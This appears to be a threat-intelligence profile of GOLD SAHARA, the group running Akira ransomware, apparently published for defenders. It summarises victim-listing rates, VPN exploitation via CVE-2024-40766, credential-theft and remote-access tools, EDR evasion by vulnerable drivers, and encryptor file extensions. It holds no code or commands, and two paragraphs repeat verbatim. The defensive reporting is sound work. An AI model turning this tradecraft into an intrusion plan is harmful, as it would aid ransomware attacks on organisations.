.svg?width=185&quality=80&auto=webp&format=auto&cache=true&immutable=true&cache-control=max-age%3D31536000 "Home"){kind=logo}
.svg?width=13&quality=80&auto=webp&format=auto&cache=true&immutable=true&cache-control=max-age%3D31536000 "Top Navigation - Sign in - Icon")
Summary
GOLD SAHARA is a cybercrime group that operates the Akira ransomware scheme. Despite not advertising for affiliates on underground forums or its leak site, the rate of victim naming indicates that a large group of individuals is responsible for deploying Akira ransomware, likely in a private ransomware-as-a-service (RaaS) arrangement. The first Akira victim was named on a dedicated leak site in April 2023 and GOLD SAHARA continued listing victims at a rate of around 25 a month until late 2024, when activity accelerated significantly. From that point, the Akira leak site has consistently seen over 50 victim names listed each month.
A popular initial access vector in Akira ransomware compromises is the exploitation of vulnerabilities in VPN services, including Cisco's. In mid-2025, Sophos analysts observed a surge in activity that involved attackers targeting a vulnerability in SonicWall SSLVPN appliances to gain access to victim networks and attempt to deploy Akira. The threat actors used valid credentials and bypassed multi-factor authentication (MFA), likely by exploiting CVE-2024-40766.
GOLD SAHARA affiliates use a wide variety of tools in their network compromises, many of which are available off-the-shelf or as built-in utilities. These include PCHunter64, AdFind, Advanced IP Scanner, and the SoftPerfect Network Scanner for system and network discovery, and the built-in Nltest Windows utility to identify domain trusts and domain controllers. Mimitatz and LaZagne are used for harvesting credentials. Remote monitoring and management (RMM) tools, like AnyDesk, Level.io, and LogMeIn, are used for remote access, as well as PuTTy. Affiliates have been observed using DLL sideloading in operations, and a bring your own vulnerable driver (BYOVD) technique to disable antivirus (AV) and endpoint detection and response (EDR) solutions for defense evasion. The WinRAR archiving tool is used to stage data for exfiltration using Rclone or MEGA. Affiliates have also been observed accessing and downloading SharePoint files to use in extortion attempts. Prior to deploying ransomware, attackers have deleted administrator accounts, likely to hinder recovery efforts.
The original version of Akira ransomware was written in C++ and files encrypted using it were appended with the .akira extension. From mid-2023, third-party researchers identified some Akira incidents that involved deployment of the Rust-based Megazord encryptor, which appends files with the .powerranges extension. This, and a new version of Akira called Akira_v2, are used interchangeably by affiliates, meaning that .akira, .aki, .akiranew, or .powerranges file extensions might be seen in ransomware operations.
A popular initial access vector in Akira ransomware compromises is the exploitation of vulnerabilities in VPN services, including Cisco's. In mid-2025, Sophos analysts observed a surge in activity that involved attackers targeting a vulnerability in SonicWall SSLVPN appliances to gain access to victim networks and attempt to deploy Akira. The threat actors used valid credentials and bypassed multi-factor authentication (MFA), likely by exploiting CVE-2024-40766.
GOLD SAHARA affiliates use a wide variety of tools in their network compromises, many of which are available off-the-shelf or as built-in utilities. These include PCHunter64, AdFind, Advanced IP Scanner, and the SoftPerfect Network Scanner for system and network discovery, and the built-in Nltest Windows utility to identify domain trusts and domain controllers. Mimitatz and LaZagne are used for harvesting credentials. Remote monitoring and management (RMM) tools, like AnyDesk, Level.io, and LogMeIn, are used for remote access, as well as PuTTy. Affiliates have been observed using DLL sideloading in operations, and a bring your own vulnerable driver (BYOVD) technique to disable antivirus (AV) and endpoint detection and response (EDR) solutions for defense evasion. The WinRAR archiving tool is used to stage data for exfiltration using Rclone or MEGA. Affiliates have also been observed accessing and downloading SharePoint files to use in extortion attempts. Prior to deploying ransomware, attackers have deleted administrator accounts, likely to hinder recovery efforts.
The original version of Akira ransomware was written in C++ and files encrypted using it were appended with the .akira extension. From mid-2023, third-party researchers identified some Akira incidents that involved deployment of the Rust-based Megazord encryptor, which appends files with the .powerranges extension. This, and a new version of Akira called Akira_v2, are used interchangeably by affiliates, meaning that .akira, .aki, .akiranew, or .powerranges file extensions might be seen in ransomware operations.
Contact us
Contact us directly whether your organization needs immediate assistance or
you want to discuss your incident readiness, response, and testing needs.